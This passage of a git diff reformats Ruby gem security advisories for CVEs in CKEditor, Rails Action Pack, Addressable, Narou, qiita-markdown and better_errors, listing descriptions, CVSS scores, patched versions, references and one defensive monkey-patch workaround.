+title: 'CVE-2021-33829 (ckeditor): ckeditor4 vulnerable to cross-site scripting'
+comments: false
+categories:
+- ckeditor
+advisory:
+  gem: ckeditor
+  cve: 2021-33829
+  ghsa: rgx6-rjj4-c388
+  url: https://ckeditor.com/blog/ckeditor-4.16.1-with-accessibility-enhancements/#improvements-for-comments-in-html-parser
+  title: ckeditor4 vulnerable to cross-site scripting
+  date: 2021-06-21
+  description: |
+    A cross-site scripting (XSS) vulnerability in the HTML Data Processor
+    in CKEditor 4 4.14.0 through 4.16.x before 4.16.1 allows remote attackers to inject
+    executable JavaScript code through a crafted comment because `--!>` is mishandled.
+  cvss_v3: 6.1
+  unaffected_versions:
+  - "< 5.1.1"
+  patched_versions:
+  - ">= 5.1.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-33829
+    - https://ckeditor.com/blog/ckeditor-4.16.1-with-accessibility-enhancements/#improvements-for-comments-in-html-parser
+    - https://www.npmjs.com/package/ckeditor4
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NYA354LJP47KCVJMTUO77ZCX3ZK42G3T/
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UVOYN2WKDPLKCNILIGEZM236ABQASLGW/
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WAGNWHFIQAVCP537KFFS2A2GDG66J7XD/
+    - https://www.drupal.org/sa-core-2021-003
+    - https://lists.debian.org/debian-lts-announce/2021/11/msg00007.html
+    - https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/core/CVE-2021-33829.yaml
+    - https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/drupal/CVE-2021-33829.yaml
+    - https://github.com/advisories/GHSA-rgx6-rjj4-c388
+---
diff --git a/advisories/_posts/2021-07-02-CVE-2021-35514.md b/advisories/_posts/2021-07-02-CVE-2021-35514.md
index 8bfba2e9..e739dcc6 100644
--- a/advisories/_posts/2021-07-02-CVE-2021-35514.md
+++ b/advisories/_posts/2021-07-02-CVE-2021-35514.md
@@ -1,20 +1,20 @@
----
-layout: advisory
-title: 'CVE-2021-35514 (narou): Code injection in Narou'
-comments: false
-categories:
-- narou
-advisory:
-  gem: narou
-  cve: 2021-35514
-  ghsa: gwrj-88fp-5m36
-  url: https://github.com/advisories/GHSA-gwrj-88fp-5m36
-  title: Code injection in Narou
-  date: 2021-07-02
-  description: |
-    Narou (aka Narou.rb) before 3.8.0 allows Ruby Code Injection via the
-    title name or author name of a novel.
-  cvss_v3: 8.5
-  patched_versions:
-  - ">= 3.8.0"
----
+---
+layout: advisory
+title: 'CVE-2021-35514 (narou): Code injection in Narou'
+comments: false
+categories:
+- narou
+advisory:
+  gem: narou
+  cve: 2021-35514
+  ghsa: gwrj-88fp-5m36
+  url: https://github.com/advisories/GHSA-gwrj-88fp-5m36
+  title: Code injection in Narou
+  date: 2021-07-02
+  description: |
+    Narou (aka Narou.rb) before 3.8.0 allows Ruby Code Injection via the
+    title name or author name of a novel.
+  cvss_v3: 8.5
+  patched_versions:
+  - ">= 3.8.0"
+---
diff --git a/advisories/_posts/2021-07-12-CVE-2021-32740.md b/advisories/_posts/2021-07-12-CVE-2021-32740.md
index 974da9c5..3ac01504 100644
--- a/advisories/_posts/2021-07-12-CVE-2021-32740.md
+++ b/advisories/_posts/2021-07-12-CVE-2021-32740.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2021-32740 (addressable): Regular Expression Denial of Service in Addressable
-  templates'
-comments: false
-categories:
-- addressable
-advisory:
-  gem: addressable
-  cve: 2021-32740
-  ghsa: jxhc-q857-3j6g
-  url: https://github.com/advisories/GHSA-jxhc-q857-3j6g
-  date: 2021-07-12
-  title: Regular Expression Denial of Service in Addressable templates
-  description: |
-    Within the URI template implementation in Addressable, a maliciously crafted template may result in uncontrolled resource consumption,
-    leading to denial of service when matched against a URI. In typical usage, templates would not normally be read from untrusted user input,
-    but nonetheless, no previous security advisory for Addressable has cautioned against doing this.
-    Users of the parsing capabilities in Addressable but not the URI template capabilities are unaffected.
-  cvss_v3: 7.5
-  unaffected_versions:
-  - "< 2.3.0"
-  patched_versions:
-  - ">= 2.8.0"
----
+---
+layout: advisory
+title: 'CVE-2021-32740 (addressable): Regular Expression Denial of Service in Addressable
+  templates'
+comments: false
+categories:
+- addressable
+advisory:
+  gem: addressable
+  cve: 2021-32740
+  ghsa: jxhc-q857-3j6g
+  url: https://github.com/advisories/GHSA-jxhc-q857-3j6g
+  date: 2021-07-12
+  title: Regular Expression Denial of Service in Addressable templates
+  description: |
+    Within the URI template implementation in Addressable, a maliciously crafted template may result in uncontrolled resource consumption,
+    leading to denial of service when matched against a URI. In typical usage, templates would not normally be read from untrusted user input,
+    but nonetheless, no previous security advisory for Addressable has cautioned against doing this.
+    Users of the parsing capabilities in Addressable but not the URI template capabilities are unaffected.
+  cvss_v3: 7.5
+  unaffected_versions:
+  - "< 2.3.0"
+  patched_versions:
+  - ">= 2.8.0"
+---
diff --git a/advisories/_posts/2021-08-02-CVE-2021-28796.md b/advisories/_posts/2021-08-02-CVE-2021-28796.md
index 808f9602..81710bcd 100644
--- a/advisories/_posts/2021-08-02-CVE-2021-28796.md
+++ b/advisories/_posts/2021-08-02-CVE-2021-28796.md
@@ -1,20 +1,20 @@
----
-layout: advisory
-title: 'CVE-2021-28796 (qiita-markdown): Cross-Site Scripting in Qiita::Markdown'
-comments: false
-categories:
-- qiita-markdown
-advisory:
-  gem: qiita-markdown
-  cve: 2021-28796
-  ghsa: f2c9-5jqw-3xh3
-  url: https://github.com/advisories/GHSA-f2c9-5jqw-3xh3
-  title: Cross-Site Scripting in Qiita::Markdown
-  date: 2021-08-02
-  description: 'Increments Qiita::Markdown before 0.33.0 allows XSS in transformers.
-
-    '
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 0.33.0"
----
+---
+layout: advisory
+title: 'CVE-2021-28796 (qiita-markdown): Cross-Site Scripting in Qiita::Markdown'
+comments: false
+categories:
+- qiita-markdown
+advisory:
+  gem: qiita-markdown
+  cve: 2021-28796
+  ghsa: f2c9-5jqw-3xh3
+  url: https://github.com/advisories/GHSA-f2c9-5jqw-3xh3
+  title: Cross-Site Scripting in Qiita::Markdown
+  date: 2021-08-02
+  description: 'Increments Qiita::Markdown before 0.33.0 allows XSS in transformers.
+
+    '
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 0.33.0"
+---
diff --git a/advisories/_posts/2021-08-02-CVE-2021-28833.md b/advisories/_posts/2021-08-02-CVE-2021-28833.md
index 851733ba..27d04e87 100644
--- a/advisories/_posts/2021-08-02-CVE-2021-28833.md
+++ b/advisories/_posts/2021-08-02-CVE-2021-28833.md
@@ -1,20 +1,20 @@
----
-layout: advisory
-title: 'CVE-2021-28833 (qiita-markdown): XSS in qiita-markdown'
-comments: false
-categories:
-- qiita-markdown
-advisory:
-  gem: qiita-markdown
-  cve: 2021-28833
-  ghsa: 9p29-94hp-8rvc
-  url: https://github.com/advisories/GHSA-9p29-94hp-8rvc
-  title: XSS in qiita-markdown
-  date: 2021-08-02
-  description: |
-    Increments Qiita::Markdown before 0.34.0 allows XSS via a crafted gist
-    link, a different vulnerability than CVE-2021-28796.
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 0.34.0"
----
+---
+layout: advisory
+title: 'CVE-2021-28833 (qiita-markdown): XSS in qiita-markdown'
+comments: false
+categories:
+- qiita-markdown
+advisory:
+  gem: qiita-markdown
+  cve: 2021-28833
+  ghsa: 9p29-94hp-8rvc
+  url: https://github.com/advisories/GHSA-9p29-94hp-8rvc
+  title: XSS in qiita-markdown
+  date: 2021-08-02
+  description: |
+    Increments Qiita::Markdown before 0.34.0 allows XSS via a crafted gist
+    link, a different vulnerability than CVE-2021-28796.
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 0.34.0"
+---
diff --git a/advisories/_posts/2021-08-19-CVE-2021-22942.md b/advisories/_posts/2021-08-19-CVE-2021-22942.md
index 032c72bd..fced2224 100644
--- a/advisories/_posts/2021-08-19-CVE-2021-22942.md
+++ b/advisories/_posts/2021-08-19-CVE-2021-22942.md
@@ -1,85 +1,85 @@
----
-layout: advisory
-title: 'CVE-2021-22942 (actionpack): Possible Open Redirect in Host Authorization
-  Middleware'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2021-22942
-  ghsa: 2rqw-v265-jf8c
-  url: https://groups.google.com/g/rubyonrails-security/c/wB5tRn7h36c
-  title: Possible Open Redirect in Host Authorization Middleware
-  date: 2021-08-19
-  description: |
-    There is a possible open redirect vulnerability in the Host Authorization
-    middleware in Action Pack. This vulnerability has been assigned the CVE
-    identifier CVE-2021-22942.
-
-    Versions Affected: >= 6.0.0.
-    Not affected: < 6.0.0
-    Fixed Versions: 6.1.4.1, 6.0.4.1
-
-    Impact
-    ------
-
-    Specially crafted “X-Forwarded-Host” headers in combination with certain
-    “allowed host” formats can cause the Host Authorization middleware in
-    Action Pack to redirect users to a malicious website.
-
-    Impacted applications will have allowed hosts with a leading dot.
-    For example, configuration files that look like this:
-
-    ```ruby
-    config.hosts <<  '.EXAMPLE.com'
-    ```
-
-    When an allowed host contains a leading dot, a specially crafted
-    Host header can be used to redirect to a malicious website.
-
-    This vulnerability is similar to CVE-2021-22881, but CVE-2021-22881 did not
-    take in to account domain name case sensitivity.
-
-    Releases
-    --------
-
-    The fixed releases are available at the normal locations.
-
-    Workarounds
-    -----------
-
-    In the case a patch can’t be applied, the following monkey patch can be
-    used in an initializer:
-
-    ```ruby
-    module ActionDispatch
-      class HostAuthorization
-        HOSTNAME = /[a-z0-9.-]+|\[[a-f0-9]*:[a-f0-9.:]+\]/i
-        VALID_ORIGIN_HOST = /\A(#{HOSTNAME})(?::\d+)?\z/
-        VALID_FORWARDED_HOST = /(?:\A|,[ ]?)(#{HOSTNAME})(?::\d+)?\z/
-
-        private
-          def authorized?(request)
-            origin_host =
-              request.get_header("HTTP_HOST")&.slice(VALID_ORIGIN_HOST, 1) || ""
-            forwarded_host =
-              request.x_forwarded_host&.slice(VALID_FORWARDED_HOST, 1) || ""
-            @permissions.allows?(origin_host) &&
-              (forwarded_host.blank? || @permissions.allows?(forwarded_host))
-          end
-      end
-    end
-    ```
-  cvss_v3: 7.6
-  unaffected_versions:
-  - "< 6.0.0"
-  patched_versions:
-  - "~> 6.0.4, >= 6.0.4.1"
-  - ">= 6.1.4.1"
-  related:
-    cve:
-    - 2021-22881
----
+---
+layout: advisory
+title: 'CVE-2021-22942 (actionpack): Possible Open Redirect in Host Authorization
+  Middleware'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2021-22942
+  ghsa: 2rqw-v265-jf8c
+  url: https://groups.google.com/g/rubyonrails-security/c/wB5tRn7h36c
+  title: Possible Open Redirect in Host Authorization Middleware
+  date: 2021-08-19
+  description: |
+    There is a possible open redirect vulnerability in the Host Authorization
+    middleware in Action Pack. This vulnerability has been assigned the CVE
+    identifier CVE-2021-22942.
+
+    Versions Affected: >= 6.0.0.
+    Not affected: < 6.0.0
+    Fixed Versions: 6.1.4.1, 6.0.4.1
+
+    Impact
+    ------
+
+    Specially crafted “X-Forwarded-Host” headers in combination with certain
+    “allowed host” formats can cause the Host Authorization middleware in
+    Action Pack to redirect users to a malicious website.
+
+    Impacted applications will have allowed hosts with a leading dot.
+    For example, configuration files that look like this:
+
+    ```ruby
+    config.hosts <<  '.EXAMPLE.com'
+    ```
+
+    When an allowed host contains a leading dot, a specially crafted
+    Host header can be used to redirect to a malicious website.
+
+    This vulnerability is similar to CVE-2021-22881, but CVE-2021-22881 did not
+    take in to account domain name case sensitivity.
+
+    Releases
+    --------
+
+    The fixed releases are available at the normal locations.
+
+    Workarounds
+    -----------
+
+    In the case a patch can’t be applied, the following monkey patch can be
+    used in an initializer:
+
+    ```ruby
+    module ActionDispatch
+      class HostAuthorization
+        HOSTNAME = /[a-z0-9.-]+|\[[a-f0-9]*:[a-f0-9.:]+\]/i
+        VALID_ORIGIN_HOST = /\A(#{HOSTNAME})(?::\d+)?\z/
+        VALID_FORWARDED_HOST = /(?:\A|,[ ]?)(#{HOSTNAME})(?::\d+)?\z/
+
+        private
+          def authorized?(request)
+            origin_host =
+              request.get_header("HTTP_HOST")&.slice(VALID_ORIGIN_HOST, 1) || ""
+            forwarded_host =
+              request.x_forwarded_host&.slice(VALID_FORWARDED_HOST, 1) || ""
+            @permissions.allows?(origin_host) &&
+              (forwarded_host.blank? || @permissions.allows?(forwarded_host))
+          end
+      end
+    end
+    ```
+  cvss_v3: 7.6
+  unaffected_versions:
+  - "< 6.0.0"
+  patched_versions:
+  - "~> 6.0.4, >= 6.0.4.1"
+  - ">= 6.1.4.1"
+  related:
+    cve:
+    - 2021-22881
+---
diff --git a/advisories/_posts/2021-08-23-CVE-2021-32808.md b/advisories/_posts/2021-08-23-CVE-2021-32808.md
index 196e3eab..2832bdad 100644
--- a/advisories/_posts/2021-08-23-CVE-2021-32808.md
+++ b/advisories/_posts/2021-08-23-CVE-2021-32808.md
@@ -1,47 +1,47 @@
----
-layout: advisory
-title: 'CVE-2021-32808 (ckeditor): Widget feature vulnerability allowing to execute
-  JavaScript code using undo functionality'
-comments: false
-categories:
-- ckeditor
-advisory:
-  gem: ckeditor
-  cve: 2021-32808
-  ghsa: 6226-h7ff-ch6c
-  url: https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-6226-h7ff-ch6c
-  title: Widget feature vulnerability allowing to execute JavaScript code using undo
-    functionality
-  date: 2021-08-23
-  description: |
-    ### Affected packages
-    The vulnerability has been discovered in [Widget](https://ckeditor.com/cke4/addon/clipboard) plugin if used alongside [Undo](https://ckeditor.com/cke4/addon/undo) feature.
-
-    ### Impact
-    A potential vulnerability has been discovered in CKEditor 4 [Widget](https://ckeditor.com/cke4/addon/widget) package. The vulnerability allowed to abuse undo functionality using malformed widget HTML, which could result in executing JavaScript code. It affects all users using the CKEditor 4 plugins listed above at version >= 4.13.0.
-
-    ### Patches
-    The problem has been recognized and patched. The fix will be available in version 4.16.2.
-
-    ### For more information
-    Email us at security@cksource.com if you have any questions or comments about this advisory.
-
-    ### Acknowledgements
-    The CKEditor 4 team would like to thank Anton Subbotin ([skavans](https://github.com/skavans)) for recognizing and reporting this vulnerability.
-  cvss_v3: 7.6
-  unaffected_versions:
-  - "< 5.1.2"
-  patched_versions:
-  - ">= 5.1.2"
-  related:
-    url:
-    - https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-6226-h7ff-ch6c
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-32808
-    - https://github.com/ckeditor/ckeditor4/releases/tag/4.16.2
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NYA354LJP47KCVJMTUO77ZCX3ZK42G3T/
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UVOYN2WKDPLKCNILIGEZM236ABQASLGW/
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WAGNWHFIQAVCP537KFFS2A2GDG66J7XD/
-    - https://www.oracle.com/security-alerts/cpuoct2021.html
-    - https://www.oracle.com/security-alerts/cpujan2022.html
-    - https://github.com/advisories/GHSA-6226-h7ff-ch6c
----
+---
+layout: advisory
+title: 'CVE-2021-32808 (ckeditor): Widget feature vulnerability allowing to execute
+  JavaScript code using undo functionality'
+comments: false
+categories:
+- ckeditor
+advisory:
+  gem: ckeditor
+  cve: 2021-32808
+  ghsa: 6226-h7ff-ch6c
+  url: https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-6226-h7ff-ch6c
+  title: Widget feature vulnerability allowing to execute JavaScript code using undo
+    functionality
+  date: 2021-08-23
+  description: |
+    ### Affected packages
+    The vulnerability has been discovered in [Widget](https://ckeditor.com/cke4/addon/clipboard) plugin if used alongside [Undo](https://ckeditor.com/cke4/addon/undo) feature.
+
+    ### Impact
+    A potential vulnerability has been discovered in CKEditor 4 [Widget](https://ckeditor.com/cke4/addon/widget) package. The vulnerability allowed to abuse undo functionality using malformed widget HTML, which could result in executing JavaScript code. It affects all users using the CKEditor 4 plugins listed above at version >= 4.13.0.
+
+    ### Patches
+    The problem has been recognized and patched. The fix will be available in version 4.16.2.
+
+    ### For more information
+    Email us at security@cksource.com if you have any questions or comments about this advisory.
+
+    ### Acknowledgements
+    The CKEditor 4 team would like to thank Anton Subbotin ([skavans](https://github.com/skavans)) for recognizing and reporting this vulnerability.
+  cvss_v3: 7.6
+  unaffected_versions:
+  - "< 5.1.2"
+  patched_versions:
+  - ">= 5.1.2"
+  related:
+    url:
+    - https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-6226-h7ff-ch6c
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-32808
+    - https://github.com/ckeditor/ckeditor4/releases/tag/4.16.2
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NYA354LJP47KCVJMTUO77ZCX3ZK42G3T/
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UVOYN2WKDPLKCNILIGEZM236ABQASLGW/
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WAGNWHFIQAVCP537KFFS2A2GDG66J7XD/
+    - https://www.oracle.com/security-alerts/cpuoct2021.html
+    - https://www.oracle.com/security-alerts/cpujan2022.html
+    - https://github.com/advisories/GHSA-6226-h7ff-ch6c
+---
diff --git a/advisories/_posts/2021-08-23-CVE-2021-32809.md b/advisories/_posts/2021-08-23-CVE-2021-32809.md
index 0afccd67..ac215395 100644
--- a/advisories/_posts/2021-08-23-CVE-2021-32809.md
+++ b/advisories/_posts/2021-08-23-CVE-2021-32809.md
@@ -1,54 +1,54 @@
----
-layout: advisory
-title: 'CVE-2021-32809 (ckeditor): Clipboard feature vulnerability allowing to inject
-  arbitrary HTML into the editor using paste functionality'
-comments: false
-categories:
-- ckeditor
-advisory:
-  gem: ckeditor
-  cve: 2021-32809
-  ghsa: 7889-rm5j-hpgg
-  url: https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-7889-rm5j-hpgg
-  title: Clipboard feature vulnerability allowing to inject arbitrary HTML into the
-    editor using paste functionality
-  date: 2021-08-23
-  description: |
-    ### Affected packages
-    The vulnerability has been discovered in [clipboard](https://ckeditor.com/cke4/addon/clipboard) plugin. All plugins with [clipboard](https://ckeditor.com/cke4/addon/clipboard) plugin dependency are affected:
-
-    * [clipboard](https://ckeditor.com/cke4/addon/clipboard)
-    * [pastetext](https://ckeditor.com/cke4/addon/pastetext)
-    * [pastetools](https://ckeditor.com/cke4/addon/pastetools)
-    * [widget](https://ckeditor.com/cke4/addon/widget)
-    * [uploadwidget](https://ckeditor.com/cke4/addon/uploadwidget)
-    * [autolink](https://ckeditor.com/cke4/addon/autolink)
-    * [tableselection](https://ckeditor.com/cke4/addon/tableselection)
-
-    ### Impact
-    A potential vulnerability has been discovered in CKEditor 4 [Clipboard](https://ckeditor.com/cke4/addon/clipboard) package. The vulnerability allowed to abuse paste functionality using malformed HTML, which could result in injecting arbitrary HTML into the editor. It affects all users using the CKEditor 4 plugins listed above at version >= 4.5.2.
-
-    ### Patches
-    The problem has been recognized and patched. The fix will be available in version 4.16.2.
-
-    ### For more information
-    Email us at security@cksource.com if you have any questions or comments about this advisory.
-
-    ### Acknowledgements
-    The CKEditor 4 team would like to thank Anton Subbotin ([skavans](https://github.com/skavans)) for recognizing and reporting this vulnerability.
-  cvss_v3: 4.6
-  unaffected_versions:
-  - "< 4.1.2"
-  patched_versions:
-  - ">= 5.1.2"
-  related:
-    url:
-    - https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-7889-rm5j-hpgg
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-32809
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NYA354LJP47KCVJMTUO77ZCX3ZK42G3T/
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UVOYN2WKDPLKCNILIGEZM236ABQASLGW/
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WAGNWHFIQAVCP537KFFS2A2GDG66J7XD/
-    - https://www.oracle.com/security-alerts/cpuoct2021.html
-    - https://www.oracle.com/security-alerts/cpujan2022.html
-    - https://github.com/advisories/GHSA-7889-rm5j-hpgg
----
+---
+layout: advisory
+title: 'CVE-2021-32809 (ckeditor): Clipboard feature vulnerability allowing to inject
+  arbitrary HTML into the editor using paste functionality'
+comments: false
+categories:
+- ckeditor
+advisory:
+  gem: ckeditor
+  cve: 2021-32809
+  ghsa: 7889-rm5j-hpgg
+  url: https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-7889-rm5j-hpgg
+  title: Clipboard feature vulnerability allowing to inject arbitrary HTML into the
+    editor using paste functionality
+  date: 2021-08-23
+  description: |
+    ### Affected packages
+    The vulnerability has been discovered in [clipboard](https://ckeditor.com/cke4/addon/clipboard) plugin. All plugins with [clipboard](https://ckeditor.com/cke4/addon/clipboard) plugin dependency are affected:
+
+    * [clipboard](https://ckeditor.com/cke4/addon/clipboard)
+    * [pastetext](https://ckeditor.com/cke4/addon/pastetext)
+    * [pastetools](https://ckeditor.com/cke4/addon/pastetools)
+    * [widget](https://ckeditor.com/cke4/addon/widget)
+    * [uploadwidget](https://ckeditor.com/cke4/addon/uploadwidget)
+    * [autolink](https://ckeditor.com/cke4/addon/autolink)
+    * [tableselection](https://ckeditor.com/cke4/addon/tableselection)
+
+    ### Impact
+    A potential vulnerability has been discovered in CKEditor 4 [Clipboard](https://ckeditor.com/cke4/addon/clipboard) package. The vulnerability allowed to abuse paste functionality using malformed HTML, which could result in injecting arbitrary HTML into the editor. It affects all users using the CKEditor 4 plugins listed above at version >= 4.5.2.
+
+    ### Patches
+    The problem has been recognized and patched. The fix will be available in version 4.16.2.
+
+    ### For more information
+    Email us at security@cksource.com if you have any questions or comments about this advisory.
+
+    ### Acknowledgements
+    The CKEditor 4 team would like to thank Anton Subbotin ([skavans](https://github.com/skavans)) for recognizing and reporting this vulnerability.
+  cvss_v3: 4.6
+  unaffected_versions:
+  - "< 4.1.2"
+  patched_versions:
+  - ">= 5.1.2"
+  related:
+    url:
+    - https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-7889-rm5j-hpgg
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-32809
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NYA354LJP47KCVJMTUO77ZCX3ZK42G3T/
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UVOYN2WKDPLKCNILIGEZM236ABQASLGW/
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WAGNWHFIQAVCP537KFFS2A2GDG66J7XD/
+    - https://www.oracle.com/security-alerts/cpuoct2021.html
+    - https://www.oracle.com/security-alerts/cpujan2022.html
+    - https://github.com/advisories/GHSA-7889-rm5j-hpgg
+---
diff --git a/advisories/_posts/2021-08-23-CVE-2021-37695.md b/advisories/_posts/2021-08-23-CVE-2021-37695.md
index bdbdb114..a4937f25 100644
--- a/advisories/_posts/2021-08-23-CVE-2021-37695.md
+++ b/advisories/_posts/2021-08-23-CVE-2021-37695.md
@@ -1,53 +1,53 @@
----
-layout: advisory
-title: 'CVE-2021-37695 (ckeditor): Fake objects feature vulnerability allowing to
-  execute JavaScript code using malformed HTML.'
-comments: false
-categories:
-- ckeditor
-advisory:
-  gem: ckeditor
-  cve: 2021-37695
-  ghsa: m94c-37g6-cjhc
-  url: https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-m94c-37g6-cjhc
-  title: Fake objects feature vulnerability allowing to execute JavaScript code using
-    malformed HTML.
-  date: 2021-08-23
-  description: |
-    ### Affected packages
-    The vulnerability has been discovered in [Fake Objects](https://ckeditor.com/cke4/addon/fakeobjects) plugin. All plugins with [Fake Objects](https://ckeditor.com/cke4/addon/fakeobjects) plugin dependency are affected:
-
-    * [Fake Objects](https://ckeditor.com/cke4/addon/fakeobjects)
-    * [Link](https://ckeditor.com/cke4/addon/link)
-    * [Flash](https://ckeditor.com/cke4/addon/flash)
-    * [Iframe](https://ckeditor.com/cke4/addon/iframe)
-    * [Forms](https://ckeditor.com/cke4/addon/forms)
-    * [Page Break](https://ckeditor.com/cke4/addon/pagebreak)
-
-    ### Impact
-    A potential vulnerability has been discovered in CKEditor 4 [Fake Objects](https://ckeditor.com/cke4/addon/fakeobjects) package. The vulnerability allowed to inject malformed Fake Objects HTML, which could result in executing JavaScript code. It affects all users using the CKEditor 4 plugins listed above at version < 4.16.2.
-
-    ### Patches
-    The problem has been recognized and patched. The fix will be available in version 4.16.2.
-
-    ### For more information
-    Email us at security@cksource.com if you have any questions or comments about this advisory.
-
-    ### Acknowledgements
-    The CKEditor 4 team would like to thank Mika Kulmala ([kulmik](https://github.com/kulmik)) for recognizing and reporting this vulnerability.
-  cvss_v3: 7.3
-  patched_versions:
-  - ">= 5.1.2"
-  related:
-    url:
-    - https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-m94c-37g6-cjhc
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-37695
-    - https://github.com/ckeditor/ckeditor4/commit/de3c001540715f9c3801aaa38a1917de46cfcf58
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NYA354LJP47KCVJMTUO77ZCX3ZK42G3T/
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UVOYN2WKDPLKCNILIGEZM236ABQASLGW/
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WAGNWHFIQAVCP537KFFS2A2GDG66J7XD/
-    - https://www.oracle.com/security-alerts/cpuoct2021.html
-    - https://lists.debian.org/debian-lts-announce/2021/11/msg00007.html
-    - https://www.oracle.com/security-alerts/cpujan2022.html
-    - https://github.com/advisories/GHSA-m94c-37g6-cjhc
----
+---
+layout: advisory
+title: 'CVE-2021-37695 (ckeditor): Fake objects feature vulnerability allowing to
+  execute JavaScript code using malformed HTML.'
+comments: false
+categories:
+- ckeditor
+advisory:
+  gem: ckeditor
+  cve: 2021-37695
+  ghsa: m94c-37g6-cjhc
+  url: https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-m94c-37g6-cjhc
+  title: Fake objects feature vulnerability allowing to execute JavaScript code using
+    malformed HTML.
+  date: 2021-08-23
+  description: |
+    ### Affected packages
+    The vulnerability has been discovered in [Fake Objects](https://ckeditor.com/cke4/addon/fakeobjects) plugin. All plugins with [Fake Objects](https://ckeditor.com/cke4/addon/fakeobjects) plugin dependency are affected:
+
+    * [Fake Objects](https://ckeditor.com/cke4/addon/fakeobjects)
+    * [Link](https://ckeditor.com/cke4/addon/link)
+    * [Flash](https://ckeditor.com/cke4/addon/flash)
+    * [Iframe](https://ckeditor.com/cke4/addon/iframe)
+    * [Forms](https://ckeditor.com/cke4/addon/forms)
+    * [Page Break](https://ckeditor.com/cke4/addon/pagebreak)
+
+    ### Impact
+    A potential vulnerability has been discovered in CKEditor 4 [Fake Objects](https://ckeditor.com/cke4/addon/fakeobjects) package. The vulnerability allowed to inject malformed Fake Objects HTML, which could result in executing JavaScript code. It affects all users using the CKEditor 4 plugins listed above at version < 4.16.2.
+
+    ### Patches
+    The problem has been recognized and patched. The fix will be available in version 4.16.2.
+
+    ### For more information
+    Email us at security@cksource.com if you have any questions or comments about this advisory.
+
+    ### Acknowledgements
+    The CKEditor 4 team would like to thank Mika Kulmala ([kulmik](https://github.com/kulmik)) for recognizing and reporting this vulnerability.
+  cvss_v3: 7.3
+  patched_versions:
+  - ">= 5.1.2"
+  related:
+    url:
+    - https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-m94c-37g6-cjhc
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-37695
+    - https://github.com/ckeditor/ckeditor4/commit/de3c001540715f9c3801aaa38a1917de46cfcf58
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NYA354LJP47KCVJMTUO77ZCX3ZK42G3T/
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UVOYN2WKDPLKCNILIGEZM236ABQASLGW/
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WAGNWHFIQAVCP537KFFS2A2GDG66J7XD/
+    - https://www.oracle.com/security-alerts/cpuoct2021.html
+    - https://lists.debian.org/debian-lts-announce/2021/11/msg00007.html
+    - https://www.oracle.com/security-alerts/cpujan2022.html
+    - https://github.com/advisories/GHSA-m94c-37g6-cjhc
+---
diff --git a/advisories/_posts/2021-09-07-CVE-2021-39197.md b/advisories/_posts/2021-09-07-CVE-2021-39197.md
index a4ea33b0..32cc36ee 100644
--- a/advisories/_posts/2021-09-07-CVE-2021-39197.md
+++ b/advisories/_posts/2021-09-07-CVE-2021-39197.md
@@ -1,37 +1,37 @@
----
-layout: advisory
-title: 'CVE-2021-39197 (better_errors): Older releases of better_errors open to Cross-Site
-  Request Forgery attack'
-comments: false
-categories:
-- better_errors
-advisory:
-  gem: better_errors
-  cve: 2021-39197
-  ghsa: w3j4-76qw-wwjm
-  url: https://github.com/BetterErrors/better_errors/security/advisories/GHSA-w3j4-76qw-wwjm
-  title: Older releases of better_errors open to Cross-Site Request Forgery attack
-  date: 2021-09-07
-  description: |
-    ### Impact
